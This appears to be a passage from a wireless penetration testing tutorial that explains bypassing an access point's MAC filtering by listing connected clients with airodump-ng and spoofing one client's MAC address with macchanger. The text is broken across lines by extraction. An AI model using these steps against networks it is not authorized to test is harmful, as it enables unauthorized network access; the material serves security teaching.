Let's follow the instructions to get started:
airodump-ng
to find the MAC addresses of clients connected to the access point. We can do this by issuing the airodump-ng -c 11 -a --bssid <mac> mon0
command. By specifying the bssid
command, we will only monitor the access point, which is of interest to us. The -c 11
command sets the channel to 11
where the access point is. The -a
command ensures that, in the client section of the airodump-NG
output, only clients associated and connected to an access point are shown. This will show us all the client MAC addresses associated with the access point:macchanger
utility, which ships with BackTrack. You can use the macchanger –m <mac> wlan0
command to get this done. The MAC address you specify with the -m
command option is the new spoofed MAC address for the wlan0
interface:We monitored the air using airodump-ng
and found the MAC address of legitimate clients connected to the wireless network. We then used the macchanger
utility to change our wireless card's MAC address to match the client's. This fooled the access point into believing that we were the legitimate client, and it allowed us access to its wireless network.
You are encouraged to explore the different options of the airodump-NG utility by going through the documentation on their website at http://www.aircrack-ng.org/doku.php?id=airodump-ng.